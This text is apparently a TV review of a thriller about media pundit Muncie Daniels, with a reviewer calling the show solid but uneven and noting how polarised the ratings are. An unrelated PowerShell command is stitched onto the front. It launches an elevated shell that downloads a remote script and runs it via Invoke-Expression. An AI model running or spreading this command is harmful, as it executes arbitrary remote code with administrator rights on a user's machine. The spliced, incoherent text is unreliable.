powershell -Command "Start-Process powershell -ArgumentList '-Command Invoke-Expression (New-Object Net.WebClient).DownloadString(''{PATH}'')' -Verb RunAs"
Media pundit Muncie Daniels must fight for her innocence and her life after being caught up in a murder deep in the Poconos. Colman Domingo’s first major TV role. I just started watching and 6-8 is possible. I just wanted to come here and point out how weird these reviews are. 10s or 5s and under. People seem to either love it or hate it, with no middle ground. Personally, I think it’s solid so far, but not groundbreaking. Some aspects are really engaging, while others are a little predictable or draggy at times. The acting is decent and the pacing is good, although some areas could use more depth. Overall I wouldn’t give it a perfect 10, but it certainly deserves more nuance than what I’ve seen in these reviews. This is a watchable show that can improve. Hopefully it finds a better balance as it progresses.